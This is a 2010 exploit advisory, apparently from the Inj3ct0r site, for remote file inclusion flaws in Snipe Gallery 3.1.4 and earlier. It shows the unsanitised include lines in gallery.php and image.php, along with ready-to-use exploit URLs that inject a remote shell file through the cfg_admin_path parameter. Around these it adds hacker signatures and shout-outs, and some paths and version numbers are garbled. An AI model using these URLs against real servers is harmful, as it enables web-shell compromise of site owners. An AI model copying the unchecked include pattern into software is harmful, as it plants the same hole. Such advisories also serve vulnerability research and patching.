Snipe Gallery <= 3.1.4 (gallery.php and image.php) RFI Vu
Posted on 20 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Snipe Gallery <= 3.1.4 (gallery.php and image.php) RFI Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================== Snipe Gallery <= 3.1.4 (gallery.php and image.php) RFI Vulnerabilities ====================================================================== __ __ ___ __ __ /'__` / \__ /'__` /\_ ___ /\_/\_L ___ ,_/ / _ __ ___ ___ ___ ___ / /' _ ` / /_/_\_<_ /'___ / /`'__ /'___ / __` /' __` __` / / / L / \__/ \_ \_ / __/ \__// L / / / \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ /\_ \____ \____/ \_ \_ \_ /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ /_//____//___/ /_//_//_/ \____/ /___/ # ----------------------oOO---(_)---OOo----------------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Sn!pEr.S!Te /____/ 2o1o | # ------------------------------------------------------------ Remote File Inclusion Vulnerability # ----------------------------------------------------------- ---------------------------------------------------------------- Snipe Gallery <==3.1.4 ( gallery.php ) ---------------------------------------------------------------- #[+] Author : Sn!pEr.S!Te Hacker # # [+] Email : sniper-site@HoTMaiL.coM # # [+] T34M Sn!pEr.S!Te Hacker # # [+] 20-5-2010 # # [+] Script : Image Galleries » Snipe Gallery # [+] Download:http://sourceforge.net/projects/snipegallery/files/snipegallery%203/snipegallery%203.1.4/snipegallery-3.1.4.zip/download # Version: [3.1.4] # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= Exploit : snipegallery-3.1.4 admin gallery gallery.php http://localhost/snipegallery-3.1.4admin gallery gallery.php?cfg_admin_path=[shell.txt ] htpp://127.0.0.1/snipegallery-3.1.4admin gallery gallery.php?cfg_admin_path=[shell.txt ] include ($cfg_admin_path."/lib/display_image.php"); line : 80 Exploit : snipegallery-3.1.5 image.php http://localhost/snipegallery-3.1.5 image.php?cfg_admin_path=[shell.txt ] htpp://127.0.0.1/snipegallery-3.1.5 image.php?cfg_admin_path=[shell.txt ] include ($cfg_admin_path."/lib/display_image.php"); line : 117 web site Favorites my : http://inj3ct0r.com/ & http://www.hack0wn.com/ & http://www.exploit-db.com friend my :liar - sm Hacker -baby hacker -Dr.PaL x HaCkEr -saleh Hacker - ALhal alsab - ThE DarK - abo badr - aStoorh alqssim - Ramad Hacker- h-ex - yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - Mr.koka- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
